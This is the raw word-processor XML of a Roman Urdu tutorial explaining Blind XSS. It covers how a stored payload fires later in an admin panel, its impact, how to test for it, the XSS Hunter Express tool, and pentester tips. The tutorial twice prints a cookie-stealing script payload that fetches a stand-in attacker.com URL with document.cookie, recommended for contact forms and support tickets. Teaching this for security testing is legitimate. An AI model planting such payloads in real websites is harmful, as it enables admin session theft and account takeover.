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  <w:t xml:space="preserve">Chalo ab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Blind XSS</w:t>
      </w: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  <w:t xml:space="preserve"> ko detail mein samajhtay hain — yeh thoda advanced concept hai lekin main tumhe bilkul simple Roman Urdu mein step-by-step samjhaata hoon.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1. Blind XSS kya hota hai?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Style w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Simple definition: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Blind XSS bhi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Stored XSS jaisa hota hai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>, lekin: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 xml:space="preserve">Tum apna payload run hota hua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>khud nahi dekh sakte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>👉 Tumhe nahi pata hota ke kab aur kahan execute hoga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Easy samajh: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Payload store ho jata hai</w:t>
        <w:br/>
        <w:t>👉 Baad mein kisi aur user (usually admin/staff) ke browser mein run hota hai</w:t>
        <w:br/>
        <w:t xml:space="preserve">👉 Tumhe sirf us waqt pata chalta hai jab tumhe koi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>callback (response)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> milta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Real Life Analogy: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Socho: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Tum ek trap set karte ho (jaise camera)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Tum wahan nahi ho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Jab koi banda aata hai → camera tumhe notification bhejta hai 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Blind XSS bhi same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2. Example Scenario (Contact Form Attack)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Situation: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Website pe ek </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>contact form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> hai: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User message bhejta hai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Yeh message database mein save hota hai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Staff baad mein admin panel mein dekhte hain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Attacker kya karta hai?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Normal message ki jagah yeh dalta hai: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&lt;script&gt;fetch('https://attacker.com/log?data='+document.cookie)&lt;/script&gt;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Kya hota hai?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Website message ko check nahi karti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Payload database mein save ho jata hai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Staff member admin panel open karta hai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Script run hoti hai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Cookies attacker ko bhej di jati hain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Attacker ne kabhi admin panel dekha bhi nahi</w:t>
        <w:br/>
        <w:t>👉 Phir bhi usne attack kar diya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3. Attack ka Flow (Step by Step)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Attacker input field mein payload inject karta hai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Payload store ho jata hai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Admin/staff us data ko open karta hai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JavaScript run hoti hai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Attacker ko callback milta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4. “Blind” kyun kehte hain?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Kyunki attacker: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Apna payload test nahi kar sakta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Output nahi dekh sakta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Sirf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>result ka wait karta hai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">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5. Potential Impact (Kya nuksan hota hai)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1. Admin Account Hijack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Staff cookies mil jati hain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Full system access mil sakta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2. Sensitive Data Leak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Admin panel ka data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Private messages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User records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3. Internal URLs Leak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Hidden admin pages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Internal systems ka structure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4. Full System Compromise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Agar admin powerful hai → poori website control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6. Blind XSS ko test kaise karte hain?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Yeh sabse important part hai.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1: Aise fields dhoondo jahan data store hota hai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Common targets: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Contact forms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Feedback forms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Support tickets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Admin messages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Logs / reports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2: Payload mein callback add karo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Simple alert kaam nahi karega ❌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Kyunki tum dekh nahi sakte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Correct payload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0" w:name="code-block-viewer"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&lt;script&gt;fetch('https://attacker.com/log?c='+document.cookie)&lt;/script&gt;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Yeh jab run hoga → tumhe request mil jayegi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3: Wait karo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Kabhi instant trigger hota hai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Kabhi hours/days lag jate hain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4: Response analyze karo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Tumhe mil sakta hai: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Cookies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URL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Page content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7. Tool: XSS Hunter Express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Yeh ek popular tool hai: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XSS Hunter Express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Yeh kya karta hai?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Automatically payload generate karta hai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Callback capture karta hai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Cookies, URL, DOM data save karta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Simple samajh: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Tum payload daalte ho</w:t>
        <w:br/>
        <w:t>👉 Tool tumhe batata hai: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kab trigger hua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kis browser mein hua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kya data mila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8. Important Difference (All XSS types)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="464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0"/>
        <w:gridCol w:w="2169"/>
        <w:gridCol w:w="937"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="154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Tum dekh sakte ho?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Storage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Reflected XSS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Stored XSS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 XSS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Blind XSS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</w:tbl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9. Common Mistakes (Important)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Mistake 1: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Alert payload use karna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❌ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Kaam nahi karega</w:t>
        <w:br/>
        <w:t>👉 Tum dekh hi nahi sakte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Mistake 2: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Immediate result expect karna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❌ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Blind XSS mein delay hota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Mistake 3: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Callback na lagana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❌ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Phir tumhe pata hi nahi chalega ke trigger hua ya nahi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10. Real Pentester Tips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Tip 1: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Har stored field mein test karo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Tip 2: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Unique payload use karo (identify karne ke liye)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Tip 3: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Different endpoints try karo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Tip 4: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Patience rakho (delay normal hai)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11. Short Summary (Roman Urdu)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Blind XSS stored XSS jaisa hota hai lekin attacker apna payload run hota hua nahi dekh sakta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Payload kisi aur user (usually admin) ke browser mein run hota hai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Attacker ko sirf callback se pata chalta hai ke attack successful hua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Iske liye payload mein HTTP request hona zaruri hai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Yeh bohot dangerous hota hai kyunki admin access mil sakta hai</w:t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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>723</Words>
  <Characters>3296</Characters>
  <CharactersWithSpaces>3890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2026-04-03T12:59:37Z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